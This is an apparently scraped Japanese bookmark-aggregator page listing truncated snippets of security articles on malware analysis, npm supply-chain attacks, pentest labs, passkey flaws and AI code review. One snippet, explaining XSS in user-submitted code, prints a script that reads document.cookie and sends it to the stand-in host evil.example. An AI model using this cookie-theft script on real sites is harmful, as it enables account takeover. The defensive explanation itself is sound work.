サクサク読めて、
アプリ限定の機能も多数!
アプリで開く
本ガイドラインは、世の中のシステム開発プロジェクトのために無償で提供致します。 ただし、掲載内容および利用に際して発生した問題、それに伴う損害については、フューチャー株式会社は一切の責務を負わないものとします。 また、掲載している情報は予告なく変更することがございますので、あらかじめご了承下さい。 はじめに 技術選定におけるクラウドファーストは標準となって久しく、新規開発・システム更改いずれにおいても、クラウド環境利用を検討しないシーンはない。一方、ほぼすべてのシステムがクラウド上に構築される中、毎回フルスクラッチで設計することは非効率的である。設計者は、そのシステムに固有の要件・特性をどう満たすのかの設計に心血を注ぐべきで、例えば、システム間差異が少ないコンポーネントの設計に時間を多く割くべきではない。本ガイドラインは、設計者が車輪の再発明に陥らず、真に必要な設計に集中できることを目
本稿では、実際に日本国内の企業で観測されたReact2Shell悪用事例と、マルウェアZnDoorの解析結果を共有します。本記事はSOCアナリスト 野村和也が執筆したものです はじめにSOCでは2025年12月から、日本国内においてReact2Shell(CVE-2025-55182)を悪用したインシデントを多数観測しています。それらの多くはコインマイナーなどが実行されていますが、中には未知のマルウェアが実行されるケースも存在します。 私たちは今回発見した未知のマルウェアをZnDoorと名付け、調査を行いました。ZnDoorは少なくとも2023年12月には使用されていた可能性があり、ネットワーク機器の脆弱性悪用事例と関連があると推察されます。本稿では、実際に日本国内の企業で観測されたReact2Shell悪用事例と、マルウェアZnDoorの解析結果を共有します。 攻撃フロー本攻撃の起点
npm史上最悪のサプライチェーン攻撃「Shai-Hulud 2.0」。正規パッケージのメンテナー認証情報を盗み、悪意あるバージョンをnpmに公開するという手口で、11月21日から急速に拡散しました。 この記事では2つのことを解説します: 自分が被害にあっていないか確認する方法 今後の被害を防ぐ多層防御アプローチ *この記事と同じ内容を動画でも解説していますので、動画の方が好きな方は下記からどうぞ 被害確認 - あなたは大丈夫か? Shai-Hulud 2.0は11月21日から急速に拡散しました。この日以降にnpm installを実行した人は、感染の可能性があります。 チェック1:GitHubアカウントの確認(ブラウザで完結) 確認ポイント1: 見覚えのないリポジトリ まずGitHubで自分のリポジトリ一覧を確認。 Shai-Huludは感染したアカウントにランダムな名前のパブリックリポ
セキュリティ知識分野(SecBoK)人材スキルマップ2021年版 (教育部会|情報セキュリティ知識項目(SecBoK)改訂委員会) 背景 情報セキュリティ知識項目(SecBoK)は、2016年4月の大規模改定以降、ITベンダー・セキュリティベンダーのみならず、多くの企業においてセキュリティ人材育成の際の参考資料として活用されてきました。また教育界との連携も深めてきました。しかし、逆に多くの場面でSecBoKを利用いただきたいとの思いから、SecBoK側が様々な分野への適用を意識する傾向もありました。そこでSecBoK2021では、BoK(Body of Knowledge)であるとの原点に立ち返り、ディクショナリー的位置付けとして、より多くの方が参照できることを目標に、有識者である委員の皆様のご意見を反映して改定をおこないました。 情報セキュリティ知識項目(SecBoK)2021の特長につ
ペネトレーションテストを担当してますWHIです。 皆さんペネトレーションテストしてますか? オンプレのActive Directoryだけで満足してませんか? 昨今のOA環境のインフラ情勢として、従業員向け端末の管理はADに代わってEntra IDやその両方を同期するハイブリッド型に移り変わりつつあります。 ペンテスターもそのような変化に追従して日々新しく採用される技術スタックへのペネトレーションテスト能力の研鑽が望まれる時代です。 OSCPなどを受講した方はわかってくれるかと思いますが、いち早くペンテストの腕を身に着けるには実際の環境をいじくり倒す他ないでしょう。 そのような時必要になるのが検証環境です。 この記事ではEntra IDの検証環境を無料で作成する方法をご紹介します。Microsoft Entra IDのプラン Entra IDのプランとして明示的に販売されているのはP1や
公衆無線LANは盗聴の危険があると言われていますが、常時SSLが普及した現在どのような状況で盗聴される可能性があるでしょうか。 この動画では偽のアクセスポイントを使ってしまった利用者を想定して、かつサイトのドメイン名は本物であるという前提での盗聴を実演を交えて解説します。 また、背景知識として、いわゆる「ウェブ認証」などで用いられるCaptiveポータル(俗に「ホテルページ」などとも呼ばれる)についても解説しています。 この動画では、利用者が正しくない利用法をすることによりオンラインバンキングのID・パスワードを盗聴されていますが、サイトに脆弱性があるわけではありません。 この動画の末尾では、このような攻撃にあわないためのサイト側、利用者側双方の対策について解説しています。 ※ 注意 ・動画中の解説では80/TCPのみBurp Suiteにリダイレクトしていますが、実演では443/TC
はじめに こんにちは、GMO FlattSecurity株式会社セキュリティエンジニアの小武です。 先日公開した記事「Passkey認証の実装ミスに起因する脆弱性・セキュリティリスク」では、「8. Non DiscoverableCredentialのフローとの混在」において、StrongKey FIDO Serverのアカウント乗っ取りが可能な脆弱性について言及しました。StrongKey FIDO Serverはオープンソースで提供されているFIDOサーバー製品です。 この脆弱性は、様々なセキュリティ的利点を持つPasskey認証であっても、実装ミスによって脆弱になり得るということを示しています。本記事では、この脆弱性がソースコードレベルでどのような問題を含み、どのように修正されたのかを詳しく解説します。 また、GMO FlattSecurityはPasskey認証に特化した脆
https://aiau.connpass.com/event/365588/
転職・求人情報サイトのtypeエンジニアtypeITニュース 日本のサイバーセキュリティは20年遅れ? 「攻撃前に潰す」が常識の今、各国のサイバー戦略とは【西尾素己】 2025.08.06ITニュースセキュリティーグローバルイベント 「陸・海・空、そして宇宙。それに続く第5の戦場として“サイバー”が機能し始めています」 そう語るのは多摩大学大学院 特任教授であり、英国系コンサルティングファームでパートナーを務める西尾素己さん。近年ではロシア・ウクライナ有事におけるサイバー戦の分析を技術官として担当するなどの活躍を見せるホワイトハッカーでもある。 サイバーセキュリティの最前線で活動してきた西尾さんは、日本のセキュリティの現状をどう見ているのか。そして世界各国はどのような戦略でサイバーセキュリティというテーマに取り組んでいるのか。 2025年6月14日に開催されたITエンジニア向けイベ
Today we're introducing automatedsecurity reviews in Claude Code. Using ourGitHub Actions integration and a new /security-review command, developers can easily ask Claude to identifysecurity concerns—and then haveit fix them. As developers increasingly rely onAI to ship faster andbuild more complex systems, ensuring codesecurity becomes even more critical. These new features let you integra
背景 近年、企業システムに対するサイバー攻撃は多様化・高度化しており、企業は日々新たな脅威への対応を迫られています。さらに、脆弱性の発見件数も年々増加傾向にあり、システムのリリース前後を問わず、潜在的な脆弱性をいかに早期に発見し適切に対策を講じるかが、事業継続や信頼性維持の観点からますます重要になっています。 一方で、脆弱性診断については多くの企業が外部ベンダーへ発注するケースが一般的ですが、脆弱性の増加やリリースサイクルの高速化により対応しきれないケースが増えつつあり、内製化への関心も高まっています。 こうした背景を踏まえ、当プロジェクトでは「脆弱性診断内製化ガイド」を作成しました。ガイドの作成にあたり、まず複数のツールを用いた技術検証で脆弱性診断の概要や概念、自動・手動診断の違いを整理し、それぞれの特性や有効性を明らかにしました。そのうえで、文献調査やアンケート、有識者・内製企業へのヒ
問題1: 他ユーザーの認証情報にアクセスできてしまう 投稿されたコードを普通にサイト内に埋め込むとXSSがやり放題な状態になります。 認証CookieのHttpOnlyが無効になっている場合 ユーザーがたくさん集まる超面白いゲームを作り、その中に以下のようなコードをしれっと含めると、そのゲームを開いたユーザーのアカウントの乗っ取りが可能になります。 <script> // 1.Cookieを取得 const stolen = document.cookie; // 2. 攻撃者のサーバーに送信 const img = new Image(); img.src = "https://evil.example/steal?cookie=" + encodeURIComponent(stolen); </script>CookieのHttpOnly属性が無効になっていると、スクリプトからCo
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
